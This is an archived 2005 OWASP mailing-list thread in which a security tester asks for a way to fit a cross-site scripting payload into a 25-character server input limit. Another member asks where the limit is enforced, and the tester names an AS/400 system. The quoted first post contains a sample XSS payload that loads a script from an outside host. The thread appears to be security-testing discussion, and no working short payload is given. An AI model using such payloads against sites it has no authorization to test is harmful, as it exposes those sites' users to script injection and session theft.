[OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less

Eoin Keary eoinkeary at hotmail.com
Thu May 19 11:08:11 EDT 2005


Its enforced on the server side as400 box which ie web enabled by "LANSA For 
the Web".
Anything over 25 chars is truncated when displayed back to user.
E

>From: Daniel Cuthbert <daniel.cuthbert at owasp.org>
>To: Eoin Keary <eoinkeary at hotmail.com>
>CC: owasp-ireland at lists.sourceforge.net, 
>owasp-testing at lists.sourceforge.net, owasp-chapters at lists.sourceforge.net
>Subject: Re: [OWASP-Chapters] XSS in 25 characters or less
>Date: Thu, 19 May 2005 12:10:09 +0100
>
>Interestingly, why have they only restricted it to 25 characters and  where 
>is this being enforced and by what?
>
>
>On 18 May 2005, at 16:22, Eoin Keary wrote:
>
>>Hi,
>>I have a window of 25 chars to perform a XSS exploit.
>>anything more is truncated by the server.
>>
>><script src=http://a.com/z.js></script>
>>
>>- this is 39 chars
>>We can do HTML injection ("<a href=....") to a degree but anyone  any 
>>ideas on how to execute script in such a small window (25 chars)?
>>we need to stay in the same domain (xyz.com) inorder to make the  attack 
>>useful. so redirecting to another domain with the "<a  href..." is no 
>>good.
>>
>>First correct answer gets a pint of Guinness (Larry S, you're not  
>>included for the pint as I owe you too many).
>>
>>Eoin
>>
>>_________________________________________________________________
>>More features, more fun, still absolutely FREE - get Messsenger  7.0! 
>>http://messenger.msn.co.uk
>>
>>
>>
>>-------------------------------------------------------
>>This SF.Net email is sponsored by Oracle Space Sweepstakes
>>Want to be the first software developer in space?
>>Enter now for the Oracle Space Sweepstakes!
>>http://ads.osdn.com/?ad_id=7412&alloc_id=16344&op=click
>>_______________________________________________
>>OWASP-Chapters mailing list
>>OWASP-Chapters at lists.sourceforge.net
>>https://lists.sourceforge.net/lists/listinfo/owasp-chapters
>>
>>
>

_________________________________________________________________
More features, more fun, still absolutely FREE - get Messsenger 7.0! 
http://messenger.msn.co.uk





More information about the Owasp-testing mailing list